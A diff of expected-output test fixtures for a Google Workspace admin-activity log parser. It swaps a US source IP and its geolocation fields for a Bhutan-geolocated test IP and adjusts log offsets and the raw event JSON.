@@ -985,26 +913,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 7687, + "log.offset": 7669, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1025,7 +949,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -1038,26 +962,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 8169, + "log.offset": 8150, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1078,7 +998,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHROME_LICENSES_REDEEMED\",\"parameters\":[{\"name\":\"APP_LICENSES_ORDER_NUMBER\",\"value\":\"abcd123\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"},{\"name\":\"CHROME_NUM_LICENSES_PURCHASED\",\"intValue\":1}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHROME_LICENSES_REDEEMED\",\"parameters\":[{\"name\":\"APP_LICENSES_ORDER_NUMBER\",\"value\":\"abcd123\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"},{\"name\":\"CHROME_NUM_LICENSES_PURCHASED\",\"intValue\":1}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -1092,26 +1012,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 8603, + "log.offset": 8583, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1132,7 +1048,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_AUTO_ADD_NEW_SERVICE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_AUTO_ADD_NEW_SERVICE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -1145,26 +1061,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 9100, + "log.offset": 9079, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1185,7 +1097,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PRIMARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PRIMARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -1198,26 +1110,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 9526, + "log.offset": 9504, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1239,7 +1147,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_WHITELIST_SETTING\",\"parameters\":[{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_WHITELIST_SETTING\",\"parameters\":[{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -1253,26 +1161,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 9946, + "log.offset": 9923, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1294,7 +1198,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"COMMUNICATION_PREFERENCES_SETTING_CHANGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"COMMUNICATION_PREFERENCES_SETTING_CHANGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -1309,26 +1213,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 10401, + "log.offset": 10377, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1349,7 +1249,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CONFLICT_ACCOUNT_ACTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CONFLICT_ACCOUNT_ACTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1363,26 +1263,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 10917,
+ "log.offset": 10892,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1404,7 +1300,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_FEEDBACK_SOLICITATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_FEEDBACK_SOLICITATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1418,26 +1314,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 11381,
+ "log.offset": 11355,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1459,7 +1351,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_CONTACT_SHARING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_CONTACT_SHARING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1472,26 +1364,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 11843,
+ "log.offset": 11816,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1512,7 +1400,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "creation"
@@ -1524,26 +1412,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 12264,
+ "log.offset": 12236,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1565,7 +1449,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1578,26 +1462,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 12657,
+ "log.offset": 12628,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1618,7 +1498,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
